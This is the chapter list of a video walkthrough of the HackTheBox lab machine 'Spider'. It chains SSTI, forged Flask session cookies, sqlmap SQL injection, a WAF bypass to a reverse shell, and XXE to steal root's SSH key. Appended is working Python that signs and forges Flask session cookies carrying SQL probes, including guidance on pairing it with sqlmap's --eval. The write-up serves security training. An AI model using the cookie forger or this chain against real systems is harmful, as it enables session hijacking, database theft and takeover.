00:00 - Intro
01:10 - Start of nmap
02:40 - Adding spider.htb to our hosts file so we can access the site by its domain name
03:30 - Playing with the registration of the website and examining the cookie
06:20 - Putting a bunch of bad characters in our username and discovering odd behaviors
10:05 - Dumping the Flask configuration via SSTI; a more complex SSTI payload is not possible because of the username length limit
12:30 - We have the cookie secret, using Flask-Unsign to create malicious cookies and discover SQL Injection
16:25 - Sending our SQL Injection Payload to the server and confirming it is SQL Injectable
18:05 - Using the --eval option of sqlmap to have sqlmap sign each payload it sends, then dumping the database
22:45 - Getting Chiv's password from SQLMap then logging into the web application
24:30 - Testing SSTI on the admin panel that we got to from Chiv and discovering a WAF (Web Application Firewall)
26:40 - Using wfuzz to enumerate the bad characters which trigger the WAF
29:00 - Playing with wfuzz encoders to URLEncode everything from our wordlist
33:50 - Obfuscating our SSTI Payload so the bad characters are not present and getting a reverse shell
37:10 - Reverse shell returned
41:10 - Using SSH to setup a port forward which allows us to hit 127.0.0.1:8080 on the remote host
43:00 - Examining the authentication cookie and discovering an XML document inside the cookie
44:00 - Testing for XML External Entity (XXE) injection
45:50 - Using PayloadsAllTheThings to help us craft an XXE payload to read files
48:30 - Grabbing the SSH Private Key via XML Entity Injection and logging in as root
HackTheBox - Spider, video walkthrough by IppSec, published 23 October 2021.
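The steps at 12:30 (forging cookies with Flask-Unsign once the secret is known) and 18:05 (having sqlmap re-sign every payload via --eval) both rest on one fact: a Flask session cookie is just URL-safe base64 JSON, a timestamp and an HMAC-SHA1 over both, keyed with a value derived from SECRET_KEY. Anyone holding SECRET_KEY can therefore mint any session they like. The following is an added example, not code from the video, from IppSec or from flask-unsign, that reimplements that layout with only the Python standard library so the signing and the server-side check can be seen side by side. SECRET_KEY and the session fields are constructed for the example; nothing here is the box's real secret or schema.

```python
"""Sign and verify Flask-style session cookies with a known SECRET_KEY.

Layout reproduced (as configured by Flask on itsdangerous):
  <base64url(JSON)>.<base64url(timestamp)>.<base64url(HMAC-SHA1)>
with the JSON body zlib-compressed and prefixed by "." when that is shorter,
salt "cookie-session" and itsdangerous' "hmac" key derivation.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"          # salt Flask passes to itsdangerous

# Assumed secret for this example only (not a real application's key).
SECRET_KEY = "example-secret-key"


def _b64encode(raw: bytes) -> bytes:
    """URL-safe base64 with the '=' padding stripped, as itsdangerous does."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64decode(data: bytes) -> bytes:
    """Inverse of _b64encode: restore padding before decoding."""
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret_key: str) -> bytes:
    """itsdangerous 'hmac' key derivation: HMAC-SHA1(secret, salt)."""
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def sign_session(data: dict, secret_key: str, timestamp: Optional[int] = None) -> str:
    """Produce a cookie the server will accept for an arbitrary session dict."""
    payload = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:      # same threshold itsdangerous uses
        body = b"." + _b64encode(compressed)
    else:
        body = _b64encode(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = body + b"." + _b64encode(ts_bytes)
    sig = hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest()
    return (value + b"." + _b64encode(sig)).decode()


def verify_session(cookie: str, secret_key: str, max_age: Optional[int] = None) -> Optional[dict]:
    """Server-side check: returns the session dict, or None if the cookie is
    malformed, the signature does not match, or the timestamp is too old."""
    try:
        value, sig = cookie.encode().rsplit(b".", 1)
        body, ts_b64 = value.rsplit(b".", 1)
    except ValueError:
        return None
    expected = hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest()
    if not hmac.compare_digest(expected, _b64decode(sig)):
        return None                               # forged or tampered
    ts = int.from_bytes(_b64decode(ts_b64), "big")
    if max_age is not None and time.time() - ts > max_age:
        return None                               # expired
    if body.startswith(b"."):
        payload = zlib.decompress(_b64decode(body[1:]))
    else:
        payload = _b64decode(body)
    return json.loads(payload)


def forge_probe_cookie(field: str, probe: str, secret_key: str) -> str:
    """Put an attacker-chosen string (e.g. a SQL metacharacter) into one
    session field and sign it. The field name is an assumption for the
    example; in the video the injectable field is found by experiment."""
    return sign_session({field: probe}, secret_key)
```

Usage: `forge_probe_cookie("username", "x'", SECRET_KEY)` yields a cookie that passes `verify_session` and carries the quote into whatever query the server builds from that field. A `--eval` snippet for sqlmap would call the same `sign_session` with sqlmap's current payload substituted into the dict and write the result into the cookie header, which is exactly why the server keeps accepting signed requests while the payload changes underneath. The `verify_session` side shows the defensive corollary: with an unguessable, never-leaked SECRET_KEY the HMAC check rejects any edit to the body or timestamp, so the session's integrity is only as strong as the secrecy of that key.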